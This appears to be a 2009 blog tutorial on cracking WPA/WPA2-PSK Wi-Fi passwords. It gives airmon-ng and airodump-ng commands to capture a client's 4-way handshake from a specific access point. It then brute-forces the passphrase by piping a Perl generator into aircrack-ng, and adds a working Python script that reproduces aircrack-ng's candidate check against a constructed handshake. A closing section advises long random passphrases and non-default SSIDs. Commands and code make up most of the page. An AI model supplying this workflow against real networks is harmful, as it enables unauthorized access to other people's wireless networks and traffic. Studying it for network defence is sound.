Put the card into monitor mode on channel 6 with airmon-ng. The commands below assume the monitor interface is still called wlan0; if airmon-ng reports a different name (mon0 on older builds, wlan0mon on newer ones), use that instead.
sudo airmon-ng start wlan0 6
Target the MAC (BSSID) of a specific access point with airodump-ng and wait until "WPA handshake: <BSSID>" appears at the top right of the output, which means it captured a client's 4-way handshake. A client has to (re)associate while you are listening; the beacon traffic alone is useless for cracking.
sudo airodump-ng -c 6 --bssid 00:00:00:A0:32:14 -w psk wlan0
If you grabbed a huge capture, trim it to the handshake frames with Wireshark (or its command-line companion editcap). WPA/WPA2 passphrases are 8 to 63 characters and aircrack-ng skips anything shorter, so start the generator at length 8 rather than 1; the 1 to 7 range is wasted work. Even at length 8 the full 62-character alphabet is about 2.2 x 10^14 candidates, and each one costs 4096 rounds of PBKDF2-HMAC-SHA1, so this only pays off against short, simple or dictionary-derived passwords. John the Ripper can also be piped into aircrack-ng the same way, via -w - (read candidates from stdin).
perl ./wg.pl -l 8 -u 8 -v abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng -e linksys -w - psk-01.cap
The best passwords make use of the full 63-character limit with WPA2 + AES (CCMP), the strongest option available today. The keyspace is large enough to make the average calculator read "Error": even a 63-character string drawn from the same 5 characters has 5^63 (roughly 10^44) possibilities, which is out of reach for any brute force, as long as the string is actually random and not a repeated pattern or phrase that a wordlist rule would produce. Change the default SSID too: the PMK is PBKDF2(passphrase, SSID), so precomputed tables exist for common SSIDs like linksys, and a unique SSID forces the attacker to start from scratch.
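To see what aircrack-ng actually does with each candidate that wg.pl or John pipes in, and why lengths under 8 are skipped and every guess is expensive, here is the verification step written out. This is an added example for this page, not code from aircrack-ng or the attached wg.pl. The handshake it checks against is constructed (fixed MAC addresses and nonces, MIC computed from a known passphrase, no RSN IE in the key data) so it runs offline; against a real capture the SSID, BSSID, client MAC, both nonces, the EAPOL-Key message 2 frame and its MIC would be read from the .cap file.

```python
"""Check WPA/WPA2-PSK candidates against a 4-way handshake the way aircrack-ng does.

Added example for this page; it is not aircrack-ng's or wg.pl's code. Per candidate:
PBKDF2-HMAC-SHA1(passphrase, SSID, 4096) -> PMK, PRF-512 -> PTK, HMAC over EAPOL
message 2 -> MIC, compare with the captured MIC. The handshake below is CONSTRUCTED
from a known passphrase so the script runs offline; real values come from the .cap.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

PBKDF2_ITERATIONS = 4096  # fixed by IEEE 802.11i; the reason each guess is expensive


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ITERATIONS, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) blocks, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 * 20 = 80 bytes >= 64
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed). Key descriptor version 1
    (TKIP) uses HMAC-MD5, version 2 (CCMP/AES) uses HMAC-SHA1 truncated to 16 bytes."""
    if key_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes      # from message 1 (AP -> client)
    snonce: bytes      # from message 2 (client -> AP)
    eapol: bytes       # EAPOL-Key message 2 with its 16-byte MIC field zeroed
    mic: bytes         # the MIC as captured in message 2
    key_version: int   # low 3 bits of Key Information: 1 = TKIP, 2 = CCMP


def candidate_mic(passphrase: str, hs: Handshake) -> bytes:
    """The MIC message 2 would carry if `passphrase` were the network key."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]  # KCK = PTK[0:16]
    return eapol_mic(kck, hs.eapol, hs.key_version)


def crack(candidates: Iterable[str], hs: Handshake) -> Optional[str]:
    """Return the first candidate whose MIC matches, skipping lengths that
    cannot be a WPA passphrase (8..63), as aircrack-ng does."""
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue
        if hmac.compare_digest(candidate_mic(cand, hs), hs.mic):
            return cand
    return None


def build_demo_handshake(passphrase: str = "linksys1", ssid: str = "linksys") -> Handshake:
    """CONSTRUCTED handshake: fixed MACs and nonces, MIC computed from `passphrase`.
    The BSSID matches the airodump-ng command above; the client MAC is made up."""
    ap_mac = bytes.fromhex("000000a03214")
    sta_mac = bytes.fromhex("001122334455")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # EAPOL-Key descriptor for message 2: type 2 (RSN), Key Info 0x010A (version 2,
    # pairwise, MIC set), key length 0, replay counter 1, SNonce, zero IV/RSC/ID,
    # zeroed MIC at offset 81, empty key data (a real message 2 carries the RSN IE).
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key
    hs = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, b"", key_version=2)
    hs.mic = candidate_mic(passphrase, hs)
    return hs


if __name__ == "__main__":
    hs = build_demo_handshake()
    # "linksys" is 7 characters and is skipped without spending any PBKDF2 work on it.
    print(crack(["linksys", "password", "Linksys1", "linksys1"], hs))
```

The 4096 PBKDF2 iterations in pmk_from_passphrase are where essentially all of the time goes, which is why a wordlist of short and common passphrases is the realistic attack and a random 63-character key is not. Because the SSID is the PBKDF2 salt, the PMK for a given passphrase can be precomputed once per SSID and reused against any network with that name; a non-default SSID defeats that reuse.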
| Attachment | Size |
| wg.pl | 5.26 KB |
Submitted by deekayen on Tue, 12/08/2009 - 1:44am